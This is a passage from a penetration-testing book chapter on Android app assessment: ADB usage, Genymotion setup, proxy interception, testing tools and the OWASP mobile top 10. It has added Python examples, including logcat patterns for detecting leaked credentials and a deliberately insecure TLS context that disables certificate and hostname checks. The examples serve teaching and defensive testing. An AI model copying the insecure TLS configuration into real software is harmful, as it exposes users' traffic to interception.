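The device-selection logic described above, as an added example that is not code from the book: it parses the text printed by adb devices (the layout of Figures 10.20 to 10.23) and builds the adb -s <serial> argument list, refusing to guess when no device is usable. adb devices, -s, -d and -e are real adb options; the helper names and the sample listings are this example's own assumptions.

```python
"""Select the right target for adb when more than one device is attached.

Added example for this section; it is not code from the book. It parses the
text printed by `adb devices` (the same layout as Figures 10.20 to 10.23) and
builds the `adb -s <serial> ...` argument list. `adb devices`, `-s`, `-d` and
`-e` are real adb options; the helper names and sample listings are this
example's own.
"""
import subprocess
from typing import List, Tuple

# Constructed sample listings, modelled on the figures in this section.
NO_DEVICES = "List of devices attached\n\n"
ONE_DEVICE = "List of devices attached\n0072c52ca20e47cf\tdevice\n\n"
TWO_DEVICES = (
    "List of devices attached\n"
    "192.168.56.101:5555\tdevice\n"
    "0072c52ca20e47cf\tdevice\n\n"
)
UNAUTHORIZED = "List of devices attached\n0072c52ca20e47cf\tunauthorized\n\n"


def parse_devices(output: str) -> List[Tuple[str, str]]:
    """Return (serial, state) pairs from `adb devices` output.

    The header and blank lines are skipped; the state column is one of
    device, offline, unauthorized (USB debugging prompt not yet accepted), ...
    """
    pairs = []
    for line in output.splitlines():
        if not line.strip() or line.startswith("List of devices"):
            continue
        parts = line.split()
        if len(parts) >= 2:
            pairs.append((parts[0], parts[1]))
    return pairs


def is_emulator(serial: str) -> bool:
    """Serials of the form emulator-NNNN are SDK emulators; a Genymotion VM shows
    up as ip:port (see Figure 10.23), which this example also treats as an
    emulator. That is an assumption of this example, not adb's own -e rule."""
    return serial.startswith("emulator-") or ":" in serial


def choose_target(output: str, prefer: str = "usb") -> List[str]:
    """Return the selector flags that address exactly one usable device.

    no usable device  -> RuntimeError (missing drivers, USB debugging off,
                         or the Allow USB debugging prompt not accepted)
    one usable device -> [] (no flag needed)
    several           -> ['-s', serial] for the first device of the preferred
                         kind, so the choice is explicit rather than implicit
    """
    devices = parse_devices(output)
    ready = [serial for serial, state in devices if state == "device"]
    if not ready:
        others = [d for d in devices if d[1] != "device"]
        raise RuntimeError(f"no usable device attached (other states: {others})")
    if len(ready) == 1:
        return []
    want_emulator = prefer == "emulator"
    matching = [s for s in ready if is_emulator(s) == want_emulator]
    if not matching:
        raise RuntimeError(f"no {prefer} device among {ready}")
    return ["-s", matching[0]]


def adb_argv(output: str, *command: str, prefer: str = "usb") -> List[str]:
    """Full argument vector, e.g. ['adb', '-s', '0072c52ca20e47cf', 'shell']."""
    return ["adb", *choose_target(output, prefer=prefer), *command]


def run_adb(*command: str, prefer: str = "usb") -> str:
    """Query the real adb (must be on PATH) and run `command` on the chosen device."""
    listing = subprocess.run(["adb", "devices"], capture_output=True,
                             text=True, check=True).stdout
    result = subprocess.run(adb_argv(listing, *command, prefer=prefer),
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    print(adb_argv(TWO_DEVICES, "shell"))                    # USB device selected
    print(adb_argv(TWO_DEVICES, "shell", prefer="emulator"))  # Genymotion VM selected
```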


Installing an application to the device 


Installing an Android app on a hardware device or an emulator is a basic prerequisite during the 
evaluation process. You can use the ADB install command, which takes the APK file to be 
installed, as shown in Figure 10.24: 


adb install <nameoftheapp.apk> 


c:\>adb install nameoftheapp.apk 
2847 KB/s (1573498 bytes in 0.539s) 
        pkg: /data/local/tmp/nameoftheapp.apk 
Success 


Figure 10.24: ADB install command 


Extracting files from the device 


To examine what data is stored during installation and uninstallation, we must ensure that no 
sensitive information is left behind that could be exploited by rogue applications or users. As a 
result, we extract the files for offline examination to access any sensitive data. This can be done 
by using the ADB pull command and specifying the file location on the device. We are grabbing 
all the apps that are installed on the rooted device in Figure 10.25: 


c:\workingfolder>adb pull /data/data/com.android.email 
pull: building file list... 
[... one line per pulled file: databases/EmailProviderBody.db and EmailProvider.db with their 
.db-journal files, and shared_prefs/AndroidMail.Main.xml, MailAppProvider.xml and 
UnifiedEmail.xml ...] 
16 files pulled. 6 files skipped. 
1991 KB/s (207059 bytes in 0.101s) 


Figure 10.25: ADB pull command 


Storing files to the device 


Most of the time, we will also want to copy local files from the desktop to the Android device. 
The syntax is adb push <local file> <remote location>, where <remote location> is the 
path on the device where the file should be stored. For example, the following command-line 
output shows a pushme.JPG file being copied from a local workstation to the device's /sdcard/ 
folder, as shown in Figure 10.26: 


C:\...\sdk\platform-tools>adb push pushme.JPG /sdcard/ 
6786 KB/s (840927 bytes in 0.121s) 


Figure 10.26: ADB command 


Stopping the service 


In other circumstances, we may want to disconnect the devices, in which case the ADB server 
must be restarted. This can be accomplished with the ADB kill-server command, which will 
kill the ADB connection and restart it when you provide a new ADB command. 


Viewing the log information 


Through logcat, Android provides a good view of system debugging messages; use the ADB 
logcat command, as seen in Figure 10.27. Examine the many types of logs that programs and 
systems collect in various buffers. This feature has the potential to be a source of data leakage 
during the assessment: 


c:\>adb logcat 
--------- beginning of system 
--------- beginning of main 
I/SurfaceFlinger(  208): SurfaceFlinger is starting 
E/EGL_emulation(  208): Failed to establish connection with the host 
E/SurfaceFlinger(  208): hwcomposer module not found 
E/SurfaceFlinger(  208): ERROR: failed to open framebuffer (I/O error), aborting 
--------- beginning of crash 
F/libc    (  208): Fatal signal 6 (SIGABRT), code -6 in tid 208 (surfaceflinger) 
[... remainder of the screenshot: native crash dump with the build fingerprint, ABI x86, 
pid/tid 208 (surfaceflinger) and the register values ...] 


Figure 10.27: ADB logcat command 
All the log lines begin with one of several message kinds (priorities), which can be summarized 
as follows: 

• V: Verbose 
• D: Debug 
• I: Information 
• W: Warning 
• E: Error 
• F: Fatal 
• S: Silent 
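The priority table above and the note that logcat can be a source of data leakage, as an added example that is not code from the book: a small parser for the brief logcat layout of Figure 10.27 that classifies lines by priority and flags messages that look like leaked credentials, tokens or personal data. The sample log lines and the leak patterns are constructed for this example.

```python
"""Classify logcat lines by priority and flag likely sensitive-data leaks.

Added example for the logcat section; it is not code from the book. It assumes
the default "brief" logcat layout seen in Figure 10.27, `P/Tag( pid): message`,
where P is one of the priorities listed above. The sample lines and the leak
patterns are constructed for this example.
"""
import re
from typing import Dict, List, Optional

PRIORITIES: Dict[str, str] = {
    "V": "Verbose", "D": "Debug", "I": "Information", "W": "Warning",
    "E": "Error", "F": "Fatal", "S": "Silent",
}
PRIORITY_ORDER = "VDIWEFS"  # lowest to highest

# brief format: priority/tag( pid): message
BRIEF_RE = re.compile(
    r"^(?P<prio>[VDIWEFS])/(?P<tag>[^(]+?)\s*\(\s*(?P<pid>\d+)\):\s?(?P<msg>.*)$"
)

# What an assessor looks for in app logs; deliberately simple, tune per app.
LEAK_PATTERNS = {
    "credential": re.compile(r"\b(?:pass(?:word)?|pwd|pin)\s*[=:]\s*\S+", re.I),
    "token": re.compile(
        r"(?:authorization\s*:\s*bearer\s+\S+|\b(?:token|api[_-]?key|session_?id)\s*[=:]\s*\S+)",
        re.I,
    ),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "card": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
}

# Constructed sample output (not a real device capture).
SAMPLE_LOGCAT = [
    "--------- beginning of main",
    "I/ActivityManager(  208): Start proc com.example.bank for activity com.example.bank/.LoginActivity",
    "D/LoginActivity( 1234): login request user=alice@example.com password=Hunter2!",
    "V/HttpClient( 1234): Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.constructed",
    "W/SurfaceFlinger(  208): hwcomposer module not found",
    "E/SurfaceFlinger(  208): ERROR: failed to open framebuffer (I/O error), aborting",
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one brief-format line into prio/tag/pid/msg plus the level name.

    Separator lines such as '--------- beginning of main' and the lines of a
    native crash dump have no priority prefix and yield None.
    """
    m = BRIEF_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["level"] = PRIORITIES[rec["prio"]]
    return rec


def count_by_level(lines: List[str]) -> Dict[str, int]:
    """How many parseable lines fall into each priority (the table above)."""
    counts: Dict[str, int] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            counts[rec["level"]] = counts.get(rec["level"], 0) + 1
    return counts


def find_leaks(lines: List[str], min_prio: str = "V") -> List[Dict[str, str]]:
    """Return the lines at or above `min_prio` whose message matches a leak pattern.

    Each hit records the pattern kind, the logging tag (usually the class that
    wrote the line) and the pid, which is what the assessor needs to trace the
    leak back to the component under test.
    """
    hits: List[Dict[str, str]] = []
    floor = PRIORITY_ORDER.index(min_prio)
    for line in lines:
        rec = parse_line(line)
        if rec is None or PRIORITY_ORDER.index(rec["prio"]) < floor:
            continue
        for kind, pattern in LEAK_PATTERNS.items():
            if pattern.search(rec["msg"]):
                hits.append({"kind": kind, "tag": rec["tag"], "pid": rec["pid"],
                             "level": rec["level"], "msg": rec["msg"]})
                break  # one report per line is enough
    return hits


if __name__ == "__main__":
    # With a live device, feed the lines of `adb logcat -d` output instead.
    print(count_by_level(SAMPLE_LOGCAT))
    for hit in find_leaks(SAMPLE_LOGCAT):
        print(f"{hit['level']:<11} {hit['tag']}({hit['pid']}): {hit['kind']} -> {hit['msg']}")
```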


Sideloading apps 


Sideloading typically means installing an application package in APK format onto an Android 
device. Such packages are usually downloaded from websites other than the official app store, 
Google Play. Installing a custom ROM on an Android smartphone is also possible, and ADB 
allows you to sideload the software: running ADB sideload package.zip, which is equivalent to 
ADB push followed by install, will accomplish this. 


Monkeyrunner 


Monkeyrunner is an Android SDK utility that allows developers to create or use pre-existing 
scripts to control a connected device or emulator. 


If you run ADB shell monkey 2, for example, it will inject the event ID 2 and launch the 
application without a user interface. Refer to Figure 10.28: 


c:\...\sdk\platform-tools>adb shell monkey 2 
Events injected: 2 
## Network stats: elapsed time=1185ms (0ms mobile, 0ms wifi, 1185ms not connected) 


Figure 10.28: ADB shell monkey command 


Genymotion 


Genymotion is a replacement for the Android Virtual Device (AVD) manager included with the 
Android SDK. This will be used throughout the Android assessment section of this book. 
Genymotion is only available for download after you create an account in their cloud and follow 
the steps at https://www.genymotion.com/#!/download. There are two different kinds of 
licenses: 


1. Personal use: The possibilities for running an emulation in this version of Genymotion 
are restricted. 

2. Commercial use: This version of Genymotion gives developers added features, including 
network debugging, design simulation, and automation. 


Genymotion is preferred by testers and developers as an emulator due to its superior performance 
when compared to the Android SDK’s emulators (even with Intel Hardware Accelerated 
Execution Manager enabled). This is not, however, a replacement for the Android SDK’s AVD. 


Step-by-step instructions for installing Genymotion are provided as follows: 


1. Double-click the program when it has been downloaded, and a window wizard will 
appear, as seen in Figure 10.29: 


[Figure 10.29 screenshot: Genymotion Setup Wizard welcome page ("This will install Genymotion version 2.5.4 on your computer")] 

Figure 10.29: Genymotion installation_1 


2. Selecting Next takes us to the screen in Figure 10.30, where we choose the folder in which 
to install the application. In our scenario, all the apps are installed on the C: drive. Refer to 
Figure 10.30: 


[Figure 10.30 screenshot: "Where should Genymotion be installed?" page, installation folder C:\...\Genymotion; at least 197.6 MB of free disk space is required] 

Figure 10.30: Genymotion installation_2 
3. The installation begins after confirmation, as demonstrated in Figure 10.31: 


[Figure 10.31 screenshot: "Installing" page, extracting files to C:\...\Genymotion\tools\adb.exe] 

Figure 10.31: Genymotion installation_3 


4. Genymotion uses Oracle VirtualBox to run the emulator, so the system image stays in 
VirtualBox even if the frontend software, that is, Genymotion, is uninstalled. If you did not 
download the Genymotion package that bundles VirtualBox, the step in Figure 10.32 will not 
apply to you: 


[Figure 10.32 screenshot: "Installing" page, "Installing Oracle VirtualBox 5.0.4..."] 

Figure 10.32: Genymotion installation_4 


5. As shown in Figure 10.33, our downloaded Genymotion file includes the package of a 
pre-compiled version of Oracle Virtual Box: 


[Figure 10.33 screenshot: Oracle VM VirtualBox 5.0.4 Setup Wizard welcome page] 

Figure 10.33: Oracle virtual box installation 


6. Clicking Next will force you to install VirtualBox, which will take up some space. 


7. Once Oracle VirtualBox is installed, Genymotion is installed as well, and we are ready to 
construct our first Android virtual image. Refer to Figure 10.34: 


[Figure 10.34 screenshot: "Completing the Genymotion Setup Wizard" page, with the "Launch Genymotion" checkbox] 

Figure 10.34: Genymotion installation_5 


Creating an Android virtual emulator 


Now that we have got Genymotion and Oracle VirtualBox set up, we will go ahead and make a 
new Android Virtual Emulator, which we will use to run a variety of tests. The steps to set up an 
emulator in Genymotion are as follows: 


1. When you first run Genymotion, you will see a popup for the usage notice, followed by an 
alert to build a virtual device, as shown in Figure 10.35: 


[Figure 10.35 screenshot: "Add a first virtual device" prompt: "You do not have any virtual device yet. Do you want to add a new one?" with Yes / No buttons] 

Figure 10.35: Genymotion 


2. By selecting Yes, the next choice will direct us to our Genymotion Cloud account, as 
shown in Figure 10.36: 


[Figure 10.36 screenshot: "Select a new virtual device" dialog with Android version and Device model filters above the list of available virtual devices] 

Figure 10.36: Genymotion cloud account 


3. After logging in, we can examine all the available Android images and then click Next. 


4. Selecting Next takes us to the step where we enter the name of the emulator we will 
create. We will call it Google Nexus - Penetration Testing Device in this case, as shown 
in Figure 10.37: 


[Figure 10.37 screenshot: "Create a new virtual device" dialog. Virtual device name: Google Nexus - Penetration Testing Device; base device Google Nexus 5X - 6.0.0 - API 23 - 1080x1920; Genymotion version 2.6.0; Android version 6.0.0; screen 1080x1920 at 420 dpi; memory 2048 MB; 4 CPUs; data disk capacity 32768 MB] 

Figure 10.37: Genymotion Google Nexus Device 


5. Because Genymotion uses hardware-based acceleration, we may need to configure several 
processors during the installation process. As demonstrated in the following Figure 10.38, 
we are using one processor for the basic setup: 


[Figure 10.38 screenshot: virtual device Configuration dialog: System (Processor(s), Base Memory (MB)); Screen size - Density (Predefined / Custom, with a caution that custom values may cause issues); Run virtual device in full-screen mode; Android system options (Show Android navigation bar, Use virtual keyboard for text input)] 

Figure 10.38: Genymotion device settings 


6. We are ready to use the device now that we have finished setting up the first Android 
virtual emulator by pressing Start. 


7. Finally, our virtual device should be visible, as shown in Figure 10.39: 


[Figure 10.39 screenshot: home screen of the running virtual device, showing the Gallery and Settings icons] 

Figure 10.39: Genymotion device start 


An ADB devices command can be used to confirm this, as shown in Figure 10.40: 


C:\...\sdk\platform-tools>adb devices 
List of devices attached 
192.168.56.101:5555    device 


Figure 10.40: ADB devices command 


In some circumstances, as demonstrated in Figure 10.41, we may receive the trigger for an error 
message, which can be resolved by enabling Intel Virtualization Technology, or Intel VT-x, in 
the BIOS: 


[Figure 10.41 screenshot: "Unable to start the virtual device" error: VirtualBox cannot start the virtual device; to find out the cause of the problem, start the virtual device from VirtualBox; for more information, check the log files] 

Figure 10.41: Virtualization technology message 


Installing an application to the Genymotion emulator 


Installing an application to the emulator can be done in one of two ways: either by downloading 
it or by using ADB to install one made by developers: ADB install appname.apk. 


You can also drag and drop an APK file directly into the emulator, as illustrated in Figure 10.42: 


[Figure 10.42 screenshot: Genymotion window for the Google Nexus - Penetration Testing Device showing "File transfer in progress" while the APK is dropped onto it] 

Figure 10.42: Drag and drop APK file 


Installing the Genymotion plugin to Android Studio 


If app developers write their code in Android Studio but cannot immediately test it on the 
Android emulator, it is really challenging; instead, they end up signing and installing the app 
each time. 


The following actions must be taken to enable Genymotion VMs in Android Studio: 


1. Navigate to Android Studio. Go to Settings and select Plugins. 


2. In the screen capture as follows, find genymotion, right-click on it, and then choose 
Download and Install. Refer to Figure 10.43: 


[Figure 10.43 screenshot: the Genymotion entry in the Android Studio plugin list: "This plugin allows you to create and start Genymotion virtual devices from Android Studio"] 

Figure 10.43: Genymotion plugin 


3. Launch Android Studio again. Android Studio has the Genymotion device manager 
installed. To make starting an application easier, set the application path to Genymotion 
by going to File | Settings | Other Settings | Genymotion, as seen in Figure 10.44: 


[Figure 10.44 screenshot: Other Settings > Genymotion, "Select the path to the Genymotion folder", set to C:\...\Genymotion] 

Figure 10.44: Genymotion plugin setting 


4. The Genymotion device manager has now been successfully installed. We are prepared to 
create and launch the app on the device. Refer to Figure 10.45: 


[Figure 10.45 screenshot: Genymotion Device Manager, "List of available Genymotion virtual devices" with columns Name, AOSP Version, Genymotion Version, IP Address, Status; one row: Google Nexus..., 6.0, 2.6.0, 192.168.56.101] 

Figure 10.45: Genymotion device manager 


ARM apps and play store in Genymotion 


Some applications can only execute on ARM-based hardware. To prevent such apps from 
crashing, we can add a specific package, the ARM translation, obtained from 
https://docs.google.com/file/d/0B-p1ir5SNN4adcmhtaGdMVml0Qzg/edit. 


As you can see in Figure 10.46, simply drag and drop the ZIP file onto the emulator. Keep in 
mind that the bundle varies depending on the Android platform version. Refer to Figure 10.46: 


[Figure 10.46 screenshot: "File installation warning": File Genymotion-ARM-Translation_v1.1.zip seems to be a flashable archive. Do you want to flash it to the virtual device? Caution: this operation may corrupt the virtual device] 

Figure 10.46: Drag and drop zip file 
For that, we must download the gapps-lp-20141109-signed.zip file from ... and then drag and 
drop it onto the virtual device to install the Google Play Store. 


After both packages have been installed, restart the emulator, and you should see Play Store 
installed in our Genymotion emulator, as shown in Figure 10.47: 


Figure 10.47: Install Google Play Store 


We can browse all the compatible apps in the store thanks to Play Store being available on the 
emulator. This will be incredibly helpful if you are conducting a black box analysis. 


Configuring the emulator for HTTP proxy 


Here, we are assuming two test cases: first, an Android emulator from Genymotion with a Wi-Fi 
connection, and second, a device connected to the internet over LTE/3G/2G. The same settings 
apply to a physical device. 


Let us have a look at the various proxy tools that are available before we start configuring the 
emulator for proxies. These include, but are not limited to, the following: 


• Burp Suite: The majority of penetration testers choose this proxy, which can be 
downloaded from https://portswigger.net/burp/download.html. There are two editions: 
one is free, and the other is intended for commercial usage. The commercial edition offers 
a variety of options, including scanners, among others. 
• Paros Proxy: This open-source Java-based proxy was created specifically to look for 
weaknesses in Web applications. You can download it from 
https://sourceforge.net/projects/paros/files/. It was superseded by OWASP ZAP because 
it was no longer being updated, but you can still use this proxy as a backup. 
• OWASP ZAP: This is an integrated, open-source vulnerability discovery tool. You can 
download it from https://github.com/zaproxy/zaproxy/wiki/Downloads. 


There are several additional tools that can be investigated, such as Context Application Tool, 
ProxyFuzz, Odysseus proxy, Fiddler, and others. 


There are two ways to intercept the data flow between the device and the server: 
• Setting up the proxy in Wi-Fi settings. 
• Setting up the proxy in mobile carrier settings. 


Setting up the proxy in Wi-Fi settings 
Assume that the device can only connect to Wi-Fi and does not have the capacity to use a SIM 
card: 


1. Go to Settings | Wi-Fi and choose the currently connected Wi-Fi. Hold it for 30 seconds 
to view the choices depicted in Figure 10.48: 


Figure 10.48 shows the connected network (WiredSSID) with the options Forget network and 
Modify network. 


Figure 10.48: WIFI setting 


2. Navigate to Modify Network | Advanced Option | Proxy | Manual. 


3. Enter the IP address of your proxy; in this instance, Burp Suite is running on port 8080 at 
192.168.2.1. Refer to Figure 10.49: 


Figure 10.49 shows the Advanced options of the WiredSSID network with Proxy set to Manual 
and the proxy hostname 192.168.2.1. Android notes that the HTTP proxy is used by the browser 
but may not be used by the other apps. 


Figure 10.49: Proxy IP address and proxy port setting 


4. The Wi-Fi connection is now configured to route traffic through the proxy. As Figure 10.50 
shows, Burp Proxy can now intercept the HTTP Web traffic: 


Figure 10.50: Burp suite 


If you want the device to be accessible over the network, you can change the settings to Bridge 
Mode by opening the Oracle Virtual Box and selecting Name of the VM | Settings | Network | 
Adapter 2 | Change the NAT to Bridged. By default, Genymotion configures the Network 
Adapter settings in the Oracle Virtual Box to NAT. 


Setting up the proxy on mobile carrier settings 


Let us assume that the Android device can connect to Wi-Fi and a SIM card: 


1. Go to Settings | More | Cellular networks | APN and, as seen in Figure 10.51, choose the 
APN you want to edit: 


Figure 10.51 shows the APN editor with the Proxy field set to 192.168.2.1. 


Figure 10.51: APN setting 
2. Set the IP address of your proxy and the port number. 
3. You have configured the device to connect to your proxy. 


Many features, including screen capture, phone options, the virtual device version, and others, 
are not available in Genymotion’s free edition for personal use. 


Android penetration testing tools 


There are many tools available for Android penetration testing, but let us look at the top six that 
are frequently used: 


1. Android Debug Bridge (ADB): A command-line tool called Android Debug Bridge 
(ADB) is used to interact with devices. The application can be installed, debugged, backed 
up, and data can be pushed to or pulled from the device, among other device functions. 
Refer to Figure 10.52: 


:~$ adb version 
Android Debug Bridge version 1.0.39 
Version 1:8.1.0+rf23-5~18.04 
Installed as /usr/lib/android-sdk/platform-tools/adb 
:~$ adb devices 


List of devices attached 
ZF6222C9XZ device 


:~$ 


Figure 10.52: ADB tool 


2. MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile 
application pentesting framework that can do static, dynamic, and malware analysis on 
mobile applications running on Android, iOS, and Windows. It supports binaries (APK, 
IPA, and APPX) as well as zipped source code and can be used for efficient and quick 
security analysis of Android, iOS, and Windows mobile applications. Additionally, 
MobSF has the ability to test an application dynamically, as shown in Figure 10.53. 
MobSF can be downloaded from https://github.com/MobSF/Mobile-Security-Framework-MobSF: 


Figure 10.53 shows the MobSF Web interface with its Upload & Analyze control. 


Figure 10.53: MobSF tool 


3. Drozer: MWR Labs created Drozer, a thorough security and attack framework for 
Android. You can communicate with the underlying OS, the Dalvik VM, and other 
apps’ IPC endpoints, as shown in Figure 10.54. Drozer can be downloaded from 
https://github.com/FSecureLABS/drozer: 


# drozer console connect 
Selecting fic715@be9f@bé60c ( 


(drozer ASCII-art banner) 


drozer Console (v2.4.4) 
dz> help 


drozer: Android Security Assessment Framework 


Type `help COMMAND' for more information on a particular command, or `help 
MODULE' for a particular module. 


Commands: 


cd contributors env help load permissions set unset 
clean echo exit list module run shell 


Miscellaneous help topics: 


intents 


dz> 
Figure 10.54: Drozer tool 


4. d2j-dex2jar: It is a tool for working with Android .dex and .jar files. It converts .dex 
files to .class files (zipped as jar files), as shown in Figure 10.55: 


> d2j-dex2jar.sh classes.dex 
dex2jar classes.dex -> ./classes-dex2jar.jar 
> 


Figure 10.55: d2j-dex2jar tool 


5. JD-GUI: JD-GUI is a stand-alone graphical tool that shows the Java source code of class 
files, as shown in Figure 10.56: 


Figure 10.56: JD-GUI tool 
6. Objection: Frida-powered Objection is a runtime mobile exploration toolkit, as shown in 
Figure 10.57. Without requiring a jailbroken or rooted mobile device, it was designed to 
assist in evaluating mobile applications and their security posture. This tool’s features 
include the following: 
• Bypassing SSL pinning and Root detection 
• Remove Android Heap and Keystore 
• Tracks the copy/paste buffer cache on Android 
• Hook one or more runtime methods of a class 
• Run unique Frida scripts 
• Use Android intents where necessary 


You can get it from https://github.com/sensepost/objection: 


Figure 10.57 shows the objection banner after connecting to the USB device "Motorola moto 
g(6)": objection v1.7.5, Runtime Mobile Exploration, by @leonjza from @sensepost. 


Figure 10.57: Objection tool 


Secure android applications 


For app developers that want to construct safe apps, the OWASP mobile top 10 list is an 
excellent reference. This is due to the fact that many mobile apps are naturally open to security 
vulnerabilities. Let us consider a handful of assaults against mobile apps that have happened in 
recent years. There was Pegasus spyware for WhatsApp, which gave attackers access to users’ 
smartphones. Another was the assault on the Pokémon Go app, which was vulnerable to reverse 
engineering by users who wanted to catch more Pokémon. 


Numerous additional applications and businesses, such as Tinder and MediaTek, have 
experienced mobile security assaults. But why are they so defenseless? As mobile apps can be 
downloaded from public stores and the code can be examined, they have a larger attack surface 
than Web apps. Together with the volume of user data they can gather, this makes them highly 
alluring targets for hackers. 


The most prevalent security weaknesses discovered on mobile devices are listed in the OWASP 
mobile top 10 vulnerabilities. But what vulnerabilities are listed on the OWASP mobile security 
list? 


OWASP mobile top 10 vulnerabilities 


The Open Web Application Security Project (OWASP) foundation presented the OWASP mobile 
security risks for the first time in 2011 based on comments and survey data gathered from the 
global community. Following that, additional lists were published in 2014 and 2016; the latter is 
the most recent and up-to-date OWASP mobile top 10 list. 


While there is one precise carryover from the top 10 mobile dangers list from 2014, the 
categories for the 2016 list are primarily different. For instance, two new dangers were added to 
the 2016 list while removing one item from the 2014 list. Additionally, they divided several 
categories into two to be addressed separately. Refer to Figure 10.58: 


Figure 10.58 compares the OWASP Mobile Top 10 2014 list with the OWASP Mobile Top 10 
2016 list. 


Figure 10.58: A side-by-side comparison of OWASP 2014 and 2016 mobile risks 


In light of this, let us examine the 10 mobile dangers that were ultimately selected in 2016 and 
consider how you might address these risks. 


Improper platform usage 


Improper platform usage is ranked as the top mobile security vulnerability in the most recent 
OWASP mobile top 10 ranking. Whether you use Android or iOS, each of these platforms is 
expected to follow specific development standards for security reasons. Apps may, however, 
unintentionally transgress these best practices and established recommendations or make 
mistakes during their implementation. This initial mobile security risk focuses on that. 


The exploitation of any platform functionality of the Android or iOS operating system or the 
disregard for platform security rules are considered threats. This includes concerns with the 
erroneous usage of platform elements and security controls that are a part of the mobile operating 
system, such as: 


• Unauthorized access to the device may come through misuse of the iOS Touch ID 
function. 


• Using the iOS Keychain incorrectly, such as by keeping session keys in the app’s local 
storage. 


• Requesting too many or the incorrect platform permissions. 


• Android intents (used to request an action from another app component) that are marked 
public may leak sensitive information or allow unauthorized execution. 


Remediation measures for this vulnerability: 


You need to take care of this OWASP mobile security issue on the server end of things. Using 
secure coding techniques and implementing the proper configuration settings on the server side, 
in addition to adhering to platform development rules, reduces risks. The following are some 
additional mitigation measures to stop platforms from being misused: 


• Restricting access, implementing restrictive file permissions, preventing apps from 
interacting with one another, and so on. 


• Applying the most stringent protection class for iOS keychains and following 
recommended practices to prevent shoddy control implementation. 


Insecure data storage 


Insecure data storage comes in second on the OWASP mobile top 10 lists. It is possible for your 
mobile device to disappear or be stolen and end up in the hands of an enemy. Or the attacker 
might use malware that runs on the device and acts on their behalf to exploit flaws that let 
personal information leak and give them access to sensitive data. 


Although it is not always possible to create apps that do not save data, it is essential to do it 
safely and, in a location, where neither another app nor a person would be able to access it. Dev 
teams must never assume that attackers will not have access to filesystems if they are readily 
available. Jailbreaking or rooting a mobile device is sufficient to get around encryption security. 


Remediation measures for this vulnerability: 
Threat model the app to comprehend what information assets are processed by the application 
and how the APIs handle the data. By doing this, you can: 
• Analyze the effectiveness of the encryption process and the security of the encryption 
keys. 


• Implement technologies, such as buffer overflow protection and obfuscation, to harden the 
code against tampering. 


• Wherever possible, avoid caching or storing data. 


• Implement reliable authorization and authentication checks. 


Insecure communication 


In the OWASP mobile top 10 list for 2016, insecure communication comes in third. Anyone 
keeping an eye on the network can intercept and read all the information being transferred over 
the wire if the data is sent in cleartext and unencrypted. 


Client-server data interchange is ubiquitous in mobile apps, and this data must be securely 
delivered through the device’s carrier network and the internet. Cell towers, proxies, spyware 
installed on your device, or an enemy compromising your Wi-Fi can all intercept the traffic. 
What can you do, then, to lessen the risks involved in this kind of data exchange? 


Remediation measures for this vulnerability: 
• Use industry-standard encryption techniques and other general best practices to prevent 
data theft as it moves across the network. 


• To secure all communication channels, use SSL/TLS certificates issued by reputable 
certificate authorities (CA). 


• If an incorrect SSL/TLS certificate is found or if the certificate chain verification process 
is unsuccessful, notify users. 
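The weak client-side TLS configuration these remediation points warn against, beside the hardened one, as an added example that is not part of the book (Python standard library only; the context builders, the checker and the message texts are this example's own names):

```python
"""Added example, not from the book: a client TLS context that accepts any
certificate beside a hardened one, a checker that reports the weaknesses, and
a helper that turns a failed chain verification into a user-facing message
instead of 'fixing' it by disabling verification."""
import ssl


def make_weak_client_context() -> ssl.SSLContext:
    """The 'accept any certificate' configuration that makes interception
    trivial: no hostname check and no chain verification at all."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def make_hardened_client_context() -> ssl.SSLContext:
    """Verify the chain against the platform CA store, require the hostname
    to match, and refuse protocol versions older than TLS 1.2."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_client_context(ctx: ssl.SSLContext) -> list:
    """Return a list of findings; an empty list means the context is acceptable."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate chain verification disabled (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        findings.append("hostname verification disabled (check_hostname is False)")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol versions older than TLS 1.2 are accepted")
    return findings


def explain_tls_failure(exc: BaseException) -> str:
    """Map a handshake exception to the message the app should show the user.
    A failed chain or hostname check is exactly the event the OWASP remediation
    says to surface; it must never be silenced by retrying without checks."""
    if isinstance(exc, ssl.SSLCertVerificationError):
        return ("The server's certificate could not be verified; the connection "
                "was refused to protect your data. Try again on a trusted network.")
    if isinstance(exc, ssl.SSLError):
        return "A secure connection could not be established."
    return "The server could not be reached."


# Constructed stand-ins for the exceptions a real handshake would raise.
SAMPLE_VERIFY_ERROR = ssl.SSLCertVerificationError("certificate verify failed: self-signed certificate")
SAMPLE_HANDSHAKE_ERROR = ssl.SSLError("handshake failure")


if __name__ == "__main__":
    for label, ctx in (("weak", make_weak_client_context()),
                       ("hardened", make_hardened_client_context())):
        print(label, audit_client_context(ctx) or "no findings")
    print(explain_tls_failure(SAMPLE_VERIFY_ERROR))
```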


Insecure authentication 


The next vulnerability on the OWASP list for mobile security is insecure authentication. Mobile 
apps must confirm the user’s identity prior to allowing access. A common method of executing 
an authentication bypass is to take advantage of known flaws, such as faulty service request 
validation carried out by the backend server of the mobile app. Particularly when transmitting 
sensitive data, such as banking information, mobile apps need to confirm and maintain user 
identity. 

Remediation measures for this vulnerability: 


An attacker may take advantage of holes in the mobile app authentication system. By taking 
advantage of those flaws, they can get around password restrictions or obtain more permissions, 
which can result in data theft and other harm. 


So, what can you do to stop it? 


• Do not use local authentication techniques. Place this responsibility on the server side 
instead and only download application data upon successful authentication. 


• Avoid using weak authentication techniques (such as device identity), avoid storing 
passwords locally, use multi-factor authentication (MFA), forbid the use of a four-digit 
PIN as a password, and so on. 


Insufficient cryptography 
A system’s cryptography may be broken in one of two circumstances, exposing sensitive 
